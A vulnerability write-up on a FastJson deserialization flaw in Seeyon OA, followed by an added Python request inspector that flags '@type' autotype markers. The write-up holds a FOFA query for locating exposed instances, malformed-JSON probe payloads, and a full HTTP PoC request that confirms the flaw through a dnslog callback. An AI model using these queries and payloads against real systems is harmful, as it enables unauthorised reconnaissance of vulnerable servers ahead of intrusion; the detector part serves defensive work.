0x01 Affected versions
V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1
0x02 Finding vulnerable instances
Search syntax
FOFA:"seeyon" && after="2021-05-01"
0x03 Vulnerability detection
JNDI applicability:
1. RMI vector: applicable JDK versions: before JDK 6u132, JDK 7u122, JDK 8u113
2. LDAP vector: applicable JDK versions: before JDK 11.0.1, 8u191, 7u201, 6u211
Distinguishing FastJson from Jackson:
1) Leave a curly brace unclosed and inspect the error message
2) Parameter-count method
{"name":"S", "age":21}// Fastjson does not raise an error
{"name":"S", "age":21,"xxx":123}// Jackson's syntax is comparatively strict and raises an error
3) FastJson error keyword:
com.alibaba.fastjson.JSONException, triggered as follows
{"x":"
["x":1]
{"x":{"@type":"java.lang.AutoCloseable"
DNS probing method:
Note: Content-Type: application/json
# PoCs that do not raise an error
{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}
# Raise an error, but still work
{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}
# Raise an error and return 400, but still work
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}
0x04 Reproduction
1. Verify the vulnerability with dnslog: open http://www.dnslog.cn to obtain a domain
Vulnerability PoC
POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: xxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

_json_params={"@type":"java.net.Inet4Address","val":"qn94mq.dnslog.cn"}
3. Paste the request above into BurpSuite, then set the corresponding Host and port.
A successful callback showing up on dnslog confirms that the vulnerability exists.
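Added example, not part of the original write-up: a small request inspector that flags HTTP requests whose body carries the FastJson autotype marker (`@type`) and the class names used in the §0x03 probe payloads and the §0x04 PoC. It assumes the endpoint `/seeyon/main.do` and the `_json_params` form field exactly as they appear in the PoC request above; the three sample requests are constructed for the self-test, and the dnslog label is a placeholder. Matching is done with a tolerant regex rather than a JSON parser on purpose: the first "no error" probe on the page is not valid JSON, so a detector that parses the body first and inspects the result would never see it.

```python
"""Flag FastJson autotype markers in HTTP request bodies (added example).

Detection is regex-based on the raw body text because several of the
probe payloads in the write-up are deliberately malformed JSON that
FastJson still accepts, while a strict parser rejects them.
"""
import json
import re
from urllib.parse import parse_qs

# Class names taken from the probe payloads and PoC in the write-up.
SUSPICIOUS_CLASSES = frozenset({
    "java.net.InetSocketAddress",
    "java.net.URL",
    "java.net.Inet4Address",
    "java.net.Inet6Address",
    "com.alibaba.fastjson.JSONObject",
    "java.lang.AutoCloseable",
})

# Tolerant: the class name capture stops at the next quote, so truncated
# or unbalanced payloads are still matched.
AT_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]*)')

# Endpoint and form field from the PoC request above (assumption: these
# are the values to watch in a real deployment).
WATCHED_ENDPOINT = "/seeyon/main.do"
WATCHED_PARAM = "_json_params"

SEVERITY_ORDER = ("none", "info", "medium", "high")


def body_fragments(content_type, body):
    """Return (name, text) fragments that a FastJson-backed handler might parse."""
    ct = (content_type or "").lower()
    if "application/x-www-form-urlencoded" in ct:
        fields = parse_qs(body, keep_blank_values=True)
        return [(name, value) for name, values in fields.items() for value in values]
    # JSON or anything else: inspect the whole body as one fragment.
    return [("<body>", body)]


def inspect_request(method, path, headers, body):
    """Return a list of (severity, reason) findings for one request."""
    findings = []
    content_type = next(
        (v for k, v in headers.items() if k.lower() == "content-type"), "")
    bare_path = path.split("?", 1)[0]
    for name, fragment in body_fragments(content_type, body):
        for match in AT_TYPE_RE.finditer(fragment):
            cls = match.group(1)
            severity = "high" if cls in SUSPICIOUS_CLASSES else "medium"
            findings.append((severity, f"@type={cls!r} in {name}"))
        if name == WATCHED_PARAM and bare_path == WATCHED_ENDPOINT:
            findings.append(("info", f"{WATCHED_PARAM} sent to {WATCHED_ENDPOINT}"))
    return findings


def max_severity(findings):
    """Collapse a findings list to its highest severity ('none' if empty)."""
    return max((s for s, _ in findings), key=SEVERITY_ORDER.index, default="none")


def is_well_formed_json(text):
    """True if a strict parser accepts the text; used to show why regex matching is needed."""
    try:
        json.loads(text)
        return True
    except ValueError:
        return False


# Constructed sample requests: the first mirrors the write-up's PoC (placeholder
# dnslog label), the second is the malformed "no error" probe, the third is benign.
SAMPLES = [
    ("POST", "/seeyon/main.do?method=changeLocale",
     {"Content-Type": "application/x-www-form-urlencoded"},
     '_json_params={"@type":"java.net.Inet4Address","val":"PLACEHOLDER.dnslog.invalid"}'),
    ("POST", "/seeyon/main.do?method=changeLocale",
     {"Content-Type": "application/json"},
     '{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}'),
    ("POST", "/seeyon/main.do?method=changeLocale",
     {"Content-Type": "application/json"},
     '{"name":"S", "age":21}'),
]

if __name__ == "__main__":
    for method, path, headers, body in SAMPLES:
        result = inspect_request(method, path, headers, body)
        print(method, path, max_severity(result), result)
```

Any `@type` key is itself the strongest signal for this endpoint, since `changeLocale` has no legitimate need for autotype; the class allowlist only raises the severity for the exact classes the probes use. The `is_well_formed_json` helper exists to make the caveat concrete: the second sample is flagged by the inspector even though a strict JSON parser rejects it.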